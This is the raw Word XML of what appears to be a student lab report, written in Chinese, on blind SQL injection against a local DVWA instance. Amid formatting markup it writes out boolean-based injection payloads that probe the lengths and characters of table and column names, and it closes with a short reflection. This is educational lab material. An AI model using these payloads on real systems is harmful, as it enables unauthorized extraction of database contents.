      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>猜出结果为第一张表9个字符，第二张表5个字符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECF5EBA" w14:textId="66842790" w:rsidR="0029656F" w:rsidRDefault="001B6A02" w:rsidP="0029656F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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EE06C00" wp14:editId="4BE68B8B">
            <wp:extent cx="5274310" cy="15411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B7DE" w14:textId="2DED2E03" w:rsidR="001B6A02" w:rsidRDefault="001B6A02" w:rsidP="001B6A02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使用二分法猜解每个表的名称。</w:t>
      </w:r>
      <w:r w:rsidR="008F1104" w:rsidRPr="00CC765F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>1' and</w:t>
      </w:r>
      <w:r w:rsidR="008F1104">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F1104">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>ascii</w:t>
      </w:r>
      <w:r w:rsidR="008F1104">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>(substr(</w:t>
      </w:r>
      <w:r w:rsidR="008F1104">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">(select table_name from </w:t>
      </w:r>
      <w:r w:rsidR="008F1104">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>information_schema.tables where table_schema=database()</w:t>
      </w:r>
      <w:r w:rsidR="008F1104">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> limit 0,1)</w:t>
      </w:r>
      <w:r w:rsidR="008F1104">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>,1,1))&gt;97 #</w:t>
      </w:r>
      <w:r w:rsidR="008F1104">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F1104">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>不断猜解，得出结果为guestbook和users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0AE448" w14:textId="2C8D7486" w:rsidR="008F1104" w:rsidRDefault="008F1104" w:rsidP="008F1104">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:jc w:val="left"/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3A5F872E" wp14:editId="6B36B367">
            <wp:extent cx="5274310" cy="998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21" w14:textId="37018DA0" w:rsidR="008F1104" w:rsidRDefault="005A60D4" w:rsidP="008F110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猜解字段长度：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC765F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>1' and</w:t>
      </w:r>
      <w:r w:rsidR="00802B27">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>(select count(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>_name) from information_schema.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>s where table_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidR="00802B27">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> = ‘users’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>)=1 #</w:t>
      </w:r>
      <w:r w:rsidR="007200A1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007200A1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>猜解出一共有八个字段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A309AB" w14:textId="29041767" w:rsidR="007200A1" w:rsidRPr="008F1104" w:rsidRDefault="007200A1" w:rsidP="008F1104">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>使用二分法猜解出每个字段的字符长度和名称。</w:t>
      </w:r>
      <w:r w:rsidR="002D44C4" w:rsidRPr="00CC765F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>1' and</w:t>
      </w:r>
      <w:r w:rsidR="002D44C4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> length(substr((select </w:t>
      </w:r>
      <w:r w:rsidR="002D44C4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>column</w:t>
      </w:r>
      <w:r w:rsidR="002D44C4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>_name from information_schema.</w:t>
      </w:r>
      <w:r w:rsidR="002D44C4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>columns</w:t>
      </w:r>
      <w:r w:rsidR="002D44C4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> where table_</w:t>
      </w:r>
      <w:r w:rsidR="002D44C4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidR="002D44C4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>=‘users’</w:t>
      </w:r>
      <w:r w:rsidR="002D44C4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D44C4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> limit 0,1),1))=1 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F336D9A" w14:textId="77777777" w:rsidR="00BE5C2F" w:rsidRPr="00BE5C2F" w:rsidRDefault="00BE5C2F" w:rsidP="00BE5C2F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5C2F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>心得体会</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5C2F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104EF8C0" w14:textId="19003075" w:rsidR="00CE44E4" w:rsidRPr="005710D2" w:rsidRDefault="00454C77" w:rsidP="00CE44E4">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420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学习了sql盲注技术，了解了paros的用法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D77C260" w14:textId="297D538C" w:rsidR="005710D2" w:rsidRPr="005710D2" w:rsidRDefault="005710D2" w:rsidP="00610B6D">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="005710D2" w:rsidRPr="005710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430C6" w14:textId="77777777" w:rsidR="009F64E9" w:rsidRDefault="009F64E9" w:rsidP="00BE5C2F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1AE483C0" w14:textId="77777777" w:rsidR="009F64E9" w:rsidRDefault="009F64E9" w:rsidP="00BE5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BC438" w14:textId="77777777" w:rsidR="009F64E9" w:rsidRDefault="009F64E9" w:rsidP="00BE5C2F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7D1F1653" w14:textId="77777777" w:rsidR="009F64E9" w:rsidRDefault="009F64E9" w:rsidP="00BE5C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46231"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9B78DF7E"/>
    <w:lvl w:ilvl="0" w:tplc="40FEAD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12F265F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6922DB6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3C344777"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A8CC0CA6"/>
    <w:lvl w:ilvl="0" w:tplc="D916DB60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57994105"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7AA6995C"/>
    <w:lvl w:ilvl="0" w:tplc="DB8037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A1E09B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5456C706"/>
    <w:lvl w:ilvl="0" w:tplc="4DF87F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0DA2115"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="443ACDCC"/>
    <w:lvl w:ilvl="0" w:tplc="65D0781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380058707">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="558632061">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2041660115">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1819564672">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1918635886">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="11139429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E13"/>
    <w:rsid w:val="0000472F"/>
    <w:rsid w:val="00012431"/>
    <w:rsid w:val="00015EEE"/>
    <w:rsid w:val="0003460A"/>
    <w:rsid w:val="000439A6"/>
    <w:rsid w:val="0006536B"/>
    <w:rsid w:val="0008013B"/>
    <w:rsid w:val="00087985"/>
    <w:rsid w:val="00094166"/>
    <w:rsid w:val="000A5881"/>
    <w:rsid w:val="000B24BB"/>
    <w:rsid w:val="000C008B"/>
    <w:rsid w:val="000C408B"/>
    <w:rsid w:val="000D3D0F"/>
    <w:rsid w:val="000E0C54"/>
    <w:rsid w:val="00113A8C"/>
    <w:rsid w:val="00114A1E"/>
    <w:rsid w:val="001766F1"/>
    <w:rsid w:val="00181396"/>
    <w:rsid w:val="00195F75"/>
    <w:rsid w:val="00196F98"/>
    <w:rsid w:val="001A4D7F"/>
    <w:rsid w:val="001A572E"/>
    <w:rsid w:val="001B6A02"/>
    <w:rsid w:val="001C6AD1"/>
    <w:rsid w:val="001C6E6C"/>
    <w:rsid w:val="001D79EA"/>
    <w:rsid w:val="001F1E13"/>
    <w:rsid w:val="00224DE2"/>
    <w:rsid w:val="002300CA"/>
    <w:rsid w:val="00230F31"/>
    <w:rsid w:val="002412DC"/>
    <w:rsid w:val="0025101D"/>
    <w:rsid w:val="00274577"/>
    <w:rsid w:val="00280603"/>
    <w:rsid w:val="00281263"/>
    <w:rsid w:val="0029656F"/>
    <w:rsid w:val="002D44C4"/>
    <w:rsid w:val="002D642A"/>
    <w:rsid w:val="002F28BE"/>
    <w:rsid w:val="00306243"/>
    <w:rsid w:val="00310247"/>
    <w:rsid w:val="00313E43"/>
    <w:rsid w:val="003244BB"/>
    <w:rsid w:val="00342492"/>
    <w:rsid w:val="00346EBF"/>
    <w:rsid w:val="00350369"/>
    <w:rsid w:val="00353560"/>
    <w:rsid w:val="00385FE5"/>
    <w:rsid w:val="003A1908"/>
    <w:rsid w:val="003A2E8B"/>
    <w:rsid w:val="003C3B5C"/>
    <w:rsid w:val="003D717D"/>
    <w:rsid w:val="003F27C1"/>
    <w:rsid w:val="0042588D"/>
    <w:rsid w:val="00443A61"/>
    <w:rsid w:val="00454C77"/>
    <w:rsid w:val="004566B9"/>
    <w:rsid w:val="00467034"/>
    <w:rsid w:val="004715D9"/>
    <w:rsid w:val="0048598B"/>
    <w:rsid w:val="004879A6"/>
    <w:rsid w:val="004939AA"/>
    <w:rsid w:val="004A0690"/>
    <w:rsid w:val="004B4013"/>
    <w:rsid w:val="004F7BD2"/>
    <w:rsid w:val="005024D8"/>
    <w:rsid w:val="005069A6"/>
    <w:rsid w:val="00526B2E"/>
    <w:rsid w:val="005710D2"/>
    <w:rsid w:val="00583B57"/>
    <w:rsid w:val="005922E2"/>
    <w:rsid w:val="00592A31"/>
    <w:rsid w:val="005A60D4"/>
    <w:rsid w:val="005A79E4"/>
    <w:rsid w:val="005F1DF7"/>
    <w:rsid w:val="005F53E9"/>
    <w:rsid w:val="0060397B"/>
    <w:rsid w:val="00610B6D"/>
    <w:rsid w:val="00620992"/>
    <w:rsid w:val="0062359B"/>
    <w:rsid w:val="00626161"/>
    <w:rsid w:val="0063667F"/>
    <w:rsid w:val="006530FE"/>
    <w:rsid w:val="00666BD2"/>
    <w:rsid w:val="00684305"/>
    <w:rsid w:val="00694541"/>
    <w:rsid w:val="006A322F"/>
    <w:rsid w:val="006A5187"/>
    <w:rsid w:val="006B135D"/>
    <w:rsid w:val="006B68B5"/>
    <w:rsid w:val="006B7D89"/>
    <w:rsid w:val="006E0A75"/>
    <w:rsid w:val="00712F24"/>
    <w:rsid w:val="007200A1"/>
    <w:rsid w:val="0072143C"/>
    <w:rsid w:val="00730D38"/>
    <w:rsid w:val="00767440"/>
    <w:rsid w:val="00794372"/>
    <w:rsid w:val="007B575A"/>
    <w:rsid w:val="007D4956"/>
    <w:rsid w:val="007D57BC"/>
    <w:rsid w:val="007F0D8E"/>
    <w:rsid w:val="00802547"/>
    <w:rsid w:val="00802B27"/>
    <w:rsid w:val="00804471"/>
    <w:rsid w:val="008110E3"/>
    <w:rsid w:val="008111AA"/>
    <w:rsid w:val="00815B53"/>
    <w:rsid w:val="008201DD"/>
    <w:rsid w:val="00824F95"/>
    <w:rsid w:val="00833012"/>
    <w:rsid w:val="008E7914"/>
    <w:rsid w:val="008F1104"/>
    <w:rsid w:val="00906CBF"/>
    <w:rsid w:val="00923F1E"/>
    <w:rsid w:val="009335B4"/>
    <w:rsid w:val="0096105B"/>
    <w:rsid w:val="0096648E"/>
    <w:rsid w:val="0097563C"/>
    <w:rsid w:val="00977C59"/>
    <w:rsid w:val="009807B6"/>
    <w:rsid w:val="009851A0"/>
    <w:rsid w:val="00986816"/>
    <w:rsid w:val="009954BC"/>
    <w:rsid w:val="009C3C3E"/>
    <w:rsid w:val="009D0007"/>
    <w:rsid w:val="009D2EE4"/>
    <w:rsid w:val="009F64E9"/>
    <w:rsid w:val="00A25AE0"/>
    <w:rsid w:val="00A3153C"/>
    <w:rsid w:val="00A4502A"/>
    <w:rsid w:val="00A95849"/>
    <w:rsid w:val="00AA5081"/>
    <w:rsid w:val="00AB5433"/>
    <w:rsid w:val="00AB5B67"/>
    <w:rsid w:val="00AC08C2"/>
    <w:rsid w:val="00AC4C7C"/>
    <w:rsid w:val="00AD6E93"/>
    <w:rsid w:val="00AD7E67"/>
    <w:rsid w:val="00AF153D"/>
    <w:rsid w:val="00AF5A03"/>
    <w:rsid w:val="00B116C0"/>
    <w:rsid w:val="00B15990"/>
    <w:rsid w:val="00B42335"/>
    <w:rsid w:val="00B729CB"/>
    <w:rsid w:val="00B84416"/>
    <w:rsid w:val="00BB37AF"/>
    <w:rsid w:val="00BD1E82"/>
    <w:rsid w:val="00BD502D"/>
    <w:rsid w:val="00BD5232"/>
    <w:rsid w:val="00BE0376"/>
    <w:rsid w:val="00BE5C2F"/>
    <w:rsid w:val="00BE6719"/>
    <w:rsid w:val="00C00282"/>
    <w:rsid w:val="00C04924"/>
    <w:rsid w:val="00C12F4A"/>
    <w:rsid w:val="00C14765"/>
    <w:rsid w:val="00C16449"/>
    <w:rsid w:val="00C244DE"/>
    <w:rsid w:val="00C24579"/>
    <w:rsid w:val="00C4376E"/>
    <w:rsid w:val="00C441F7"/>
    <w:rsid w:val="00CC68CC"/>
    <w:rsid w:val="00CC765F"/>
    <w:rsid w:val="00CD669E"/>
    <w:rsid w:val="00CE44E4"/>
    <w:rsid w:val="00D83D91"/>
    <w:rsid w:val="00D90592"/>
    <w:rsid w:val="00D97780"/>
    <w:rsid w:val="00DA508C"/>
    <w:rsid w:val="00DB35D2"/>
    <w:rsid w:val="00DB6210"/>
    <w:rsid w:val="00DD5693"/>
    <w:rsid w:val="00DF3888"/>
    <w:rsid w:val="00E03C4D"/>
    <w:rsid w:val="00E05016"/>
    <w:rsid w:val="00E101D3"/>
    <w:rsid w:val="00E13374"/>
    <w:rsid w:val="00E40142"/>
    <w:rsid w:val="00E464E4"/>
    <w:rsid w:val="00E55C3E"/>
    <w:rsid w:val="00E60F81"/>
    <w:rsid w:val="00E77465"/>
    <w:rsid w:val="00EA5192"/>
    <w:rsid w:val="00EA666D"/>
    <w:rsid w:val="00EB509D"/>
    <w:rsid w:val="00ED6A99"/>
    <w:rsid w:val="00EF4BEA"/>
    <w:rsid w:val="00F07DEE"/>
    <w:rsid w:val="00F120D3"/>
    <w:rsid w:val="00F37703"/>
    <w:rsid w:val="00F45F31"/>
    <w:rsid w:val="00F640A2"/>
    <w:rsid w:val="00F76518"/>
    <w:rsid w:val="00F84F22"/>
    <w:rsid w:val="00F86993"/>
    <w:rsid w:val="00FA7E29"/>
    <w:rsid w:val="00FB2B7D"/>
    <w:rsid w:val="00FD344D"/>
    <w:rsid w:val="00FE2B5D"/>
    <w:rsid w:val="00FF1E61"/>
    <w:rsid w:val="00FF332C"/>
    <w:rsid w:val="00FF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1EBE7D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{137F814D-767D-489A-AFD5-D5FE558B8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5C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5C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5C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5C2F"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00AC08C2"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="a8">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00E03C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-tag">
    <w:name w:val="html-tag"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00224DE2"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="html-attribute-name">
    <w:name w:val="html-attribute-name"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00224DE2"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="html-attribute-value">
    <w:name w:val="html-attribute-value"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00224DE2"/>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0068430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843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0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192.168.247.129/dvwa/vulnerabilities/sqli/?id=1234%20and%201=1&amp;Submit=Submit#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7</Pages>
  <Words>372</Words>
  <Characters>2126</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>17</Lines>
  <Paragraphs>4</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company> </Company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刘哲理</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>1153486883@qq.com</cp:lastModifiedBy>
  <cp:revision>52</cp:revision>
  <cp:lastPrinted>2022-05-02T04:10:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-20T15:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-18T10:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>